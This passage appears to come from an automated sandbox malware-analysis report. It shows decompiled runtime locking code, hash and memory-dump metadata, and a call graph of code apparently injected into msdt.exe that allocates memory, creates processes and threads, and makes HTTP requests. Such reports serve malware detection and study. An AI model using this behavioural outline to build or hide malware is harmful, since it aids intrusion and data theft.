												_t42 = L0088F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = L008D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E008B5329(_t74, _t92);
													_push(1);
													return E008B53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                                    0x008b53ab
                                                                    0x008b53ae
                                                                    0x008b53b1
                                                                    0x008b53b4
                                                                    0x008b53b7
                                                                    0x008d05b6
                                                                    0x008d05c0
                                                                    0x008d05c3
                                                                    0x00000000
                                                                    0x008d05c9
                                                                    0x008d05c9
                                                                    0x008d05cc
                                                                    0x008d05d5
                                                                    0x008d05d5
                                                                    0x008b53bd
                                                                    0x008b53bd
                                                                    0x008b53bd
                                                                    0x008b53be
                                                                    0x008b53be
                                                                    0x008b53be
                                                                    0x008b53c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f2269
                                                                    0x008f226d
                                                                    0x008f2349
                                                                    0x008f234d
                                                                    0x008f2273
                                                                    0x008f2276
                                                                    0x008f2279
                                                                    0x008f227e
                                                                    0x008f2283
                                                                    0x008f2287
                                                                    0x008f228a
                                                                    0x008f228d
                                                                    0x008f228f
                                                                    0x008f22bc
                                                                    0x008f22bc
                                                                    0x008f22bc
                                                                    0x008f22be
                                                                    0x008f22c4
                                                                    0x008f22cc
                                                                    0x008f22d0
                                                                    0x008f22d6
                                                                    0x008f22d7
                                                                    0x008f22da
                                                                    0x008f22df
                                                                    0x008f22e4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f22e6
                                                                    0x008f22e9
                                                                    0x008f22f4
                                                                    0x008f22f9
                                                                    0x008f22fa
                                                                    0x008f2305
                                                                    0x008f2314
                                                                    0x008f2319
                                                                    0x008f231a
                                                                    0x008f231d
                                                                    0x008f2320
                                                                    0x008f2323
                                                                    0x008f2323
                                                                    0x008f2328
                                                                    0x008f232d
                                                                    0x008f232f
                                                                    0x008f2331
                                                                    0x008f2336
                                                                    0x008f2336
                                                                    0x008f233b
                                                                    0x008f233d
                                                                    0x008f2350
                                                                    0x008f2351
                                                                    0x008f2356
                                                                    0x008f2359
                                                                    0x008f2359
                                                                    0x008f235b
                                                                    0x008f235d
                                                                    0x008b5367
                                                                    0x008b536b
                                                                    0x008b5372
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f2363
                                                                    0x008f2363
                                                                    0x008f2369
                                                                    0x008f236a
                                                                    0x008f236c
                                                                    0x008f2371
                                                                    0x008f2373
                                                                    0x00000000
                                                                    0x008f2379
                                                                    0x008f2379
                                                                    0x008f237a
                                                                    0x008f237f
                                                                    0x008f237f
                                                                    0x008f2385
                                                                    0x008f2386
                                                                    0x008f2389
                                                                    0x008f238e
                                                                    0x008f2390
                                                                    0x008b5378
                                                                    0x008b537c
                                                                    0x008f2396
                                                                    0x008f2396
                                                                    0x008f2397
                                                                    0x008f239c
                                                                    0x008f23a2
                                                                    0x008f23a3
                                                                    0x008f23a6
                                                                    0x008f23ab
                                                                    0x008f23ad
                                                                    0x00000000
                                                                    0x008f23b3
                                                                    0x008f23b3
                                                                    0x008f23b4
                                                                    0x008f23b9
                                                                    0x008f23ba
                                                                    0x008f23ba
                                                                    0x008f23bc
                                                                    0x008f23bf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008e9153
                                                                    0x008e9158
                                                                    0x008e915a
                                                                    0x008e915e
                                                                    0x008e9160
                                                                    0x00000000
                                                                    0x008e9166
                                                                    0x008e9166
                                                                    0x008e9171
                                                                    0x008e9176
                                                                    0x008e9176
                                                                    0x00000000
                                                                    0x008e9160
                                                                    0x008f23c6
                                                                    0x008f23cb
                                                                    0x008f23d7
                                                                    0x008f23d7
                                                                    0x008f23ad
                                                                    0x008f2390
                                                                    0x008f2373
                                                                    0x008f233f
                                                                    0x008f233f
                                                                    0x00000000
                                                                    0x008f233f
                                                                    0x008f2291
                                                                    0x008f2291
                                                                    0x008f2293
                                                                    0x008f2295
                                                                    0x008f229a
                                                                    0x008f22a1
                                                                    0x008f22a3
                                                                    0x008f22a7
                                                                    0x008f22a9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f22ab
                                                                    0x008f22ad
                                                                    0x008f22af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f22af
                                                                    0x008f22b1
                                                                    0x008f22b4
                                                                    0x008f22b4
                                                                    0x008f22b6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f22b6
                                                                    0x008f228f
                                                                    0x00000000
                                                                    0x008f226d
                                                                    0x008b53cb
                                                                    0x008b53ce
                                                                    0x008b53d0
                                                                    0x008b53d4
                                                                    0x008b53d6
                                                                    0x00000000
                                                                    0x008b53d8
                                                                    0x008b53e3
                                                                    0x008b53ea
                                                                    0x008b53ea
                                                                    0x008b53d6
                                                                    0x00000000

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F22F4
                                                                    Strings
                                                                    • RTL: Resource at %p, xrefs: 008F230B
                                                                    • RTL: Re-Waiting, xrefs: 008F2328
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008F22FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-871070163
                                                                    • Opcode ID: 5c3435015d093840a1535db9ae62f7347c20b4b3f3fe4f555c07318b4e33e50a
                                                                    • Instruction ID: ddec201a34dbdc4dc6bb227bbb74b8af168407c6a8d1efafce56bab452fe9458
                                                                    • Opcode Fuzzy Hash: 5c3435015d093840a1535db9ae62f7347c20b4b3f3fe4f555c07318b4e33e50a
                                                                    • Instruction Fuzzy Hash: 245104716006056BDB11AF39CC81FA677E8FF59364F104229FE18DB381EA75ED428BA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: msdt.exe PID: 2632 Parent PID: 1764 msdt.exeCOMMON

                                                                    Execution Graph

                                                                    Execution Coverage:2.8%
                                                                    Dynamic/Decrypted Code Coverage:4.7%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:449
                                                                    Total number of Limit Nodes:64

                                                                    Graph

                                                                    execution_graph 44986 25c955c LdrInitializeThunk _vswprintf_s 44937 10d000 NtClose LdrInitializeThunk 44930 11a00f NtAllocateVirtualMemory 44996 25ac77b 15 API calls 44944 25a9879 7 API calls ___swprintf_l 44953 25aa41e 14 API calls 45006 259e70f 7 API calls 44928 11304c RtlAllocateHeap RtlFreeHeap 44966 25ba421 8 API calls 2 library calls 44441 10d06c NtClose LdrInitializeThunk 44439 11a08b RtlFreeHeap 44442 11d48d 44445 119c70 44442->44445 44444 11d492 44446 119c96 44445->44446 44451 108b50 44446->44451 44448 119ca2 44449 119cc6 44448->44449 44457 107e40 44448->44457 44449->44444 44479 108aa0 44451->44479 44453 108b5d 44454 108b64 44453->44454 44486 10cf60 44453->44486 44454->44448 44458 107e67 44457->44458 44459 107fe4 44458->44459 44694 10d160 44458->44694 44459->44449 44461 107f06 44461->44459 44462 11a260 RtlAllocateHeap 44461->44462 44463 107f1c 44462->44463 44464 11a260 RtlAllocateHeap 44463->44464 44465 107f2d 44464->44465 44466 11a260 RtlAllocateHeap 44465->44466 44467 107f3e 44466->44467 44704 10aec0 44467->44704 44469 107f51 44470 113a40 6 API calls 44469->44470 44471 107f62 44470->44471 44472 113a40 6 API calls 44471->44472 44473 107f73 44472->44473 44476 107f8c 44473->44476 44710 10ba30 44473->44710 44475 113a40 6 API calls 44478 107faa 44475->44478 44476->44475 44476->44478 44714 107c70 44478->44714 44481 108ab3 44479->44481 44480 108ac6 44480->44453 44481->44480 44494 119520 44481->44494 44483 108b03 44483->44480 44505 1088c0 44483->44505 44485 108b23 44485->44453 44487 10cf79 44486->44487 44488 108b75 44487->44488 44686 118a40 44487->44686 44488->44448 44490 10cfb2 44491 10cfdd 44490->44491 44689 1184d0 44490->44689 44492 118700 NtClose 44491->44492 44492->44488 44495 119539 44494->44495 44511 113a40 44495->44511 44497 119551 44498 11955a 44497->44498 44536 119360 44497->44536 44498->44483 44500 11956e 44500->44498 44550 118170 44500->44550 44665 106e20 44505->44665 44507 1088e1 44507->44485 44508 1088da 44508->44507 44678 1070e0 44508->44678 44512 113d75 44511->44512 44518 113a54 44511->44518 44512->44497 44514 113b34 44520 113b63 44514->44520 44560 1185d0 44514->44560 44516 113ba7 44517 11a090 RtlFreeHeap 44516->44517 44523 113bb3 44517->44523 44518->44512 44557 117ec0 44518->44557 44519 113d39 44521 118700 NtClose 44519->44521 44520->44497 44522 113d40 44521->44522 44522->44497 44523->44519 44523->44520 44524 113ca9 44523->44524 44525 113c51 44523->44525 44524->44519 44529 113cbc 44524->44529 44526 113c56 44525->44526 44527 113c87 44525->44527 44528 113c6f 44525->44528 44526->44497 44527->44522 44571 113400 44527->44571 44563 1136e0 44528->44563 44603 118700 44529->44603 44531 113c7d 44531->44497 44534 113c9f 44534->44497 44535 113d28 44535->44497 44537 119371 44536->44537 44538 119383 44537->44538 44539 11a010 NtAllocateVirtualMemory 44537->44539 44538->44500 44540 1193a4 44539->44540 44620 113050 44540->44620 44542 1193f0 44542->44500 44543 1193c7 44543->44542 44544 113050 2 API calls 44543->44544 44545 1193e9 44544->44545 44545->44542 44635 114380 44545->44635 44547 11947a 44645 118130 44547->44645 44551 11818c 44550->44551 44661 258fae8 LdrInitializeThunk 44551->44661 44552 1181a7 44554 11a090 44552->44554 44662 1188e0 44554->44662 44556 1195c9 44556->44483 44558 1191d0 44557->44558 44559 117edc RtlDosPathNameToNtPathName_U 44558->44559 44559->44514 44561 1191d0 44560->44561 44562 1185ec NtCreateFile 44561->44562 44562->44516 44564 1136fc 44563->44564 44565 113724 44564->44565 44566 113738 44564->44566 44567 118700 NtClose 44565->44567 44568 118700 NtClose 44566->44568 44569 11372d 44567->44569 44570 113741 44568->44570 44569->44531 44570->44531 44572 11347e 44571->44572 44573 11344b 44571->44573 44575 11349a 44572->44575 44577 1135c9 44572->44577 44574 118700 NtClose 44573->44574 44576 11346f 44574->44576 44578 1134d1 44575->44578 44579 1134bc 44575->44579 44576->44534 44585 118700 NtClose 44577->44585 44580 1134d6 44578->44580 44581 1134ec 44578->44581 44582 118700 NtClose 44579->44582 44584 118700 NtClose 44580->44584 44591 1134f1 44581->44591 44606 11a260 44581->44606 44583 1134c5 44582->44583 44583->44534 44587 1134df 44584->44587 44586 113629 44585->44586 44586->44534 44587->44534 44590 113557 44592 113575 44590->44592 44593 11358a 44590->44593 44596 113503 44591->44596 44609 118680 44591->44609 44594 118700 NtClose 44592->44594 44595 118700 NtClose 44593->44595 44594->44596 44597 113593 44595->44597 44596->44534 44598 1135bf 44597->44598 44612 119e60 44597->44612 44598->44534 44600 1135aa 44601 11a090 RtlFreeHeap 44600->44601 44602 1135b3 44601->44602 44602->44534 44604 1191d0 44603->44604 44605 11871c NtClose 44604->44605 44605->44535 44617 1188a0 44606->44617 44608 11a278 44608->44591 44610 1191d0 44609->44610 44611 11869c NtReadFile 44610->44611 44611->44590 44613 119e84 44612->44613 44614 119e6d 44612->44614 44613->44600 44614->44613 44615 11a260 RtlAllocateHeap 44614->44615 44616 119e9b 44615->44616 44616->44600 44618 1191d0 44617->44618 44619 1188bc RtlAllocateHeap 44618->44619 44619->44608 44621 113061 44620->44621 44622 113069 44620->44622 44621->44543 44634 1131e5 44622->44634 44649 11b240 44622->44649 44624 1130bd 44625 11b240 RtlAllocateHeap 44624->44625 44628 1130c8 44625->44628 44626 113116 44629 11b240 RtlAllocateHeap 44626->44629 44628->44626 44654 11b2e0 44628->44654 44631 11312a 44629->44631 44630 11b240 RtlAllocateHeap 44633 11319d 44630->44633 44631->44630 44632 11b240 RtlAllocateHeap 44632->44634 44633->44632 44634->44543 44636 114391 44635->44636 44637 113a40 6 API calls 44636->44637 44639 1143a7 44637->44639 44638 1143fa 44638->44547 44639->44638 44640 1143e2 44639->44640 44641 1143f5 44639->44641 44642 11a090 RtlFreeHeap 44640->44642 44643 11a090 RtlFreeHeap 44641->44643 44644 1143e7 44642->44644 44643->44638 44644->44547 44646 11814c 44645->44646 44660 258fdc0 LdrInitializeThunk 44646->44660 44647 118163 44647->44500 44650 11b250 44649->44650 44651 11b256 44649->44651 44650->44624 44652 11a260 RtlAllocateHeap 44651->44652 44653 11b27c 44652->44653 44653->44624 44655 11b305 44654->44655 44658 11b33d 44654->44658 44656 11a260 RtlAllocateHeap 44655->44656 44657 11b31a 44656->44657 44659 11a090 RtlFreeHeap 44657->44659 44658->44628 44659->44658 44660->44647 44661->44552 44663 1191d0 44662->44663 44664 1188fc RtlFreeHeap 44663->44664 44664->44556 44666 106e30 44665->44666 44667 106e2b 44665->44667 44668 11a010 NtAllocateVirtualMemory 44666->44668 44667->44508 44675 106e55 44668->44675 44669 106eb8 44669->44508 44670 118130 LdrInitializeThunk 44670->44675 44671 106ebe 44672 106ee4 44671->44672 44674 118830 LdrInitializeThunk 44671->44674 44672->44508 44677 106ed5 44674->44677 44675->44669 44675->44670 44675->44671 44676 11a010 NtAllocateVirtualMemory 44675->44676 44681 118830 44675->44681 44676->44675 44677->44508 44679 1070fe 44678->44679 44680 118830 LdrInitializeThunk 44678->44680 44679->44485 44680->44679 44682 11884c 44681->44682 44685 258fb68 LdrInitializeThunk 44682->44685 44683 118863 44683->44675 44685->44683 44687 1191d0 44686->44687 44688 118a5f LookupPrivilegeValueW 44687->44688 44688->44490 44690 1184ec 44689->44690 44693 258fed0 LdrInitializeThunk 44690->44693 44691 11850b 44691->44491 44693->44691 44695 10d18c 44694->44695 44728 10d070 44695->44728 44698 10d1d1 44701 10d1e2 44698->44701 44703 118700 NtClose 44698->44703 44699 10d1b9 44700 10d1c4 44699->44700 44702 118700 NtClose 44699->44702 44700->44461 44701->44461 44702->44700 44703->44701 44705 10aed6 44704->44705 44707 10aee0 44704->44707 44705->44469 44706 10af88 44706->44469 44707->44706 44708 113a40 6 API calls 44707->44708 44709 10aff9 44708->44709 44709->44469 44711 10ba56 44710->44711 44739 10b720 44711->44739 44713 10babc 44713->44476 44762 10d420 44714->44762 44716 107e31 44716->44459 44717 107c83 44717->44716 44766 113390 44717->44766 44719 107ce2 44719->44716 44769 107a20 44719->44769 44722 11b240 RtlAllocateHeap 44725 107d29 44722->44725 44723 106e20 3 API calls 44723->44725 44725->44716 44725->44723 44727 1070e0 LdrInitializeThunk 44725->44727 44774 10abf0 44725->44774 44804 10d3c0 44725->44804 44727->44725 44729 10d08a 44728->44729 44733 10d140 44728->44733 44734 1181f0 44729->44734 44732 118700 NtClose 44732->44733 44733->44698 44733->44699 44735 11820c 44734->44735 44738 25907ac LdrInitializeThunk 44735->44738 44736 10d134 44736->44732 44738->44736 44740 10b737 44739->44740 44745 10d460 44740->44745 44744 10b7ab 44744->44713 44746 10d485 44745->44746 44755 107120 44746->44755 44748 10d4a9 44749 10b77f 44748->44749 44750 113a40 6 API calls 44748->44750 44751 11a090 RtlFreeHeap 44748->44751 44752 118950 44749->44752 44750->44748 44751->44748 44753 1191d0 44752->44753 44754 11896f CreateProcessInternalW 44753->44754 44754->44744 44756 10721f 44755->44756 44758 107135 44755->44758 44756->44748 44757 113a40 6 API calls 44760 1071a2 44757->44760 44758->44756 44758->44757 44759 1071c9 44759->44748 44760->44759 44761 11a090 RtlFreeHeap 44760->44761 44761->44759 44763 10d43f 44762->44763 44764 10d446 SetErrorMode 44763->44764 44765 10d44d 44763->44765 44764->44765 44765->44717 44808 10d1f0 44766->44808 44768 1133b6 44768->44719 44770 11a010 NtAllocateVirtualMemory 44769->44770 44773 107a45 44770->44773 44771 107c5a 44771->44722 44773->44771 44825 117af0 44773->44825 44775 10ac0f 44774->44775 44776 10ac09 44774->44776 44871 108620 44775->44871 44862 10ccb0 44776->44862 44779 10ac1c 44780 10d3c0 LdrInitializeThunk 44779->44780 44781 10ac4c 44779->44781 44803 10aea8 44779->44803 44780->44781 44782 118170 LdrInitializeThunk 44781->44782 44786 10ad76 44781->44786 44781->44803 44783 10acca 44782->44783 44783->44786 44788 10acd6 44783->44788 44784 10ad9d 44785 118700 NtClose 44784->44785 44789 10ada7 44785->44789 44786->44784 44798 10adc6 44786->44798 44787 10ad1f 44790 118700 NtClose 44787->44790 44788->44787 44791 118280 LdrInitializeThunk 44788->44791 44788->44803 44789->44725 44792 10ad3c 44790->44792 44791->44787 44877 1175a0 44792->44877 44794 10ad53 44794->44803 44880 107280 44794->44880 44797 118700 NtClose 44799 10ae7b 44797->44799 44798->44797 44800 118700 NtClose 44799->44800 44801 10ae85 44800->44801 44802 107280 3 API calls 44801->44802 44801->44803 44802->44803 44803->44725 44805 10d3d3 44804->44805 44923 118100 44805->44923 44809 10d20d 44808->44809 44815 118230 44809->44815 44812 10d255 44812->44768 44816 11824c 44815->44816 44823 258ffb4 LdrInitializeThunk 44816->44823 44817 10d24e 44817->44812 44819 118280 44817->44819 44820 11829c 44819->44820 44824 258fc60 LdrInitializeThunk 44820->44824 44821 10d27e 44821->44768 44823->44817 44824->44821 44826 11a260 RtlAllocateHeap 44825->44826 44827 117b07 44826->44827 44844 108160 44827->44844 44829 117b22 44830 117b60 44829->44830 44831 117b49 44829->44831 44834 11a010 NtAllocateVirtualMemory 44830->44834 44832 11a090 RtlFreeHeap 44831->44832 44833 117b56 44832->44833 44833->44771 44835 117b9a 44834->44835 44836 11a010 NtAllocateVirtualMemory 44835->44836 44837 117bb3 44836->44837 44838 117e40 44837->44838 44841 117e54 44837->44841 44839 11a090 RtlFreeHeap 44838->44839 44840 117e4a 44839->44840 44840->44771 44842 11a090 RtlFreeHeap 44841->44842 44843 117ea9 44842->44843 44843->44771 44845 108185 44844->44845 44846 109b30 LdrLoadDll 44845->44846 44847 1081b8 44846->44847 44849 1081dd 44847->44849 44850 10b330 44847->44850 44849->44829 44851 10b35c 44850->44851 44852 10b37c 44851->44852 44857 118490 44851->44857 44852->44849 44854 10b39f 44854->44852 44855 118700 NtClose 44854->44855 44856 10b3da 44855->44856 44856->44849 44858 1184ac 44857->44858 44861 258fbb8 LdrInitializeThunk 44858->44861 44859 1184c7 44859->44854 44861->44859 44888 10bda0 44862->44888 44864 10ccc7 44870 10cce0 44864->44870 44892 103d70 44864->44892 44866 11a260 RtlAllocateHeap 44868 10ccee 44866->44868 44867 10ccda 44905 117420 44867->44905 44868->44775 44870->44866 44872 10863b 44871->44872 44873 10d070 2 API calls 44872->44873 44874 108751 44872->44874 44875 10873c 44873->44875 44874->44779 44875->44874 44876 118700 NtClose 44875->44876 44876->44874 44878 10d3c0 LdrInitializeThunk 44877->44878 44879 1175d2 44878->44879 44879->44794 44881 107298 44880->44881 44882 109b30 LdrLoadDll 44881->44882 44883 1072b3 44882->44883 44884 1072cc PostThreadMessageW 44883->44884 44885 1072fd 44883->44885 44884->44885 44886 1072e0 44884->44886 44885->44725 44887 1072ea PostThreadMessageW 44886->44887 44887->44885 44889 10bdd3 44888->44889 44890 10d1f0 2 API calls 44889->44890 44891 10be3d 44890->44891 44891->44864 44893 103d96 44892->44893 44894 10b330 2 API calls 44893->44894 44896 103e61 44894->44896 44895 103e68 44895->44867 44896->44895 44909 10b3f0 44896->44909 44900 104083 44901 11a010 NtAllocateVirtualMemory 44900->44901 44902 104110 44901->44902 44903 11a010 NtAllocateVirtualMemory 44902->44903 44904 10412a 44903->44904 44904->44867 44907 117441 44905->44907 44906 117467 44906->44870 44907->44906 44908 117454 CreateThread 44907->44908 44908->44870 44910 10b415 44909->44910 44917 118300 44910->44917 44913 118390 44914 1183ac 44913->44914 44922 258fab8 LdrInitializeThunk 44914->44922 44915 1183cb 44915->44900 44918 11831c 44917->44918 44921 258fb50 LdrInitializeThunk 44918->44921 44919 10405c 44919->44900 44919->44913 44921->44919 44922->44915 44924 11811c 44923->44924 44927 258fd8c LdrInitializeThunk 44924->44927 44925 10d3fe 44925->44725 44927->44925 45027 25ad298 14 API calls _vswprintf_s 45030 25b4f9a 9 API calls 2 library calls 44436 1070d8 LdrInitializeThunk 45033 2580184 6 API calls ___swprintf_l 44983 25a98ba 10 API calls 44390 1172f0 44398 11a010 44390->44398 44392 11740c 44393 11732b 44393->44392 44401 109b30 44393->44401 44395 117390 Sleep 44397 117361 44395->44397 44397->44392 44397->44395 44405 116f20 44397->44405 44416 1187b0 44398->44416 44400 11a03d 44400->44393 44402 109b54 44401->44402 44403 109b90 LdrLoadDll 44402->44403 44404 109b5b 44402->44404 44403->44404 44404->44397 44406 116f45 44405->44406 44408 116f9f 44406->44408 44419 118bf0 44406->44419 44415 117036 44408->44415 44423 118c60 44408->44423 44410 116fe0 44410->44415 44427 118ce0 44410->44427 44412 11700d 44413 117016 44412->44413 44431 118d60 44412->44431 44413->44397 44415->44397 44417 1191d0 44416->44417 44418 1187cc NtAllocateVirtualMemory 44417->44418 44418->44400 44420 118c2a 44419->44420 44421 118c33 InternetOpenA 44420->44421 44422 118c4e 44420->44422 44421->44408 44422->44408 44424 118c9f 44423->44424 44425 118ca8 InternetConnectA 44424->44425 44426 118ccf 44424->44426 44425->44410 44426->44410 44428 118d1f 44427->44428 44429 118d28 HttpOpenRequestA 44428->44429 44430 118d4f 44428->44430 44429->44412 44430->44412 44432 118d9f 44431->44432 44433 118dc3 44432->44433 44434 118da8 HttpSendRequestA 44432->44434 44433->44415 44434->44415

                                                                    Executed Functions

                                                                    Function 001185D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 192 1185d0-118621 call 1191d0 NtCreateFile
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00113BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00113BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0011861D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: 15e33179a6b811717d084366a7942d3dac093fab415c6bf3812070b8ba0f73b9
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: CEF0BDB2200208ABCB08DF88DC95EEB77EDAF8C754F158248BA1D97241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00118680, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtReadFile.NTDLL(00113D62,5E972F65,FFFFFFFF,00113A21,?,?,00113D62,?,00113A21,FFFFFFFF,5E972F65,00113D62,?,00000000), ref: 001186C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: dcd478827937943d39c4e8bbce84474034440a221302cbdeb16639872b2a2354
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: 83F0A4B2200208ABCB18DF89DC95EEB77ADAF8C754F158258BE1D97241D630E851CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 001187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00102D11,00002000,00003000,00000004), ref: 001187E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction ID: efea0aed8800a5164445efd70447987edf92c32a68c54b4cf7f6f082f50b4b67
                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction Fuzzy Hash: 71F015B2200208ABCB18DF89CC85EEB77ADAF88750F118158BE1897241C630F810CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00118700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtClose.NTDLL(00113D40,?,?,00113D40,00000000,FFFFFFFF), ref: 00118725
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction ID: 03622e8d5fda47d19aa1731f9077bf4c6c522fe9211fa538e0890531c628906f
                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction Fuzzy Hash: E6D012752002147BD714EB98CC49ED7779CEF44760F154455BA185B242C570F54086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025900C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
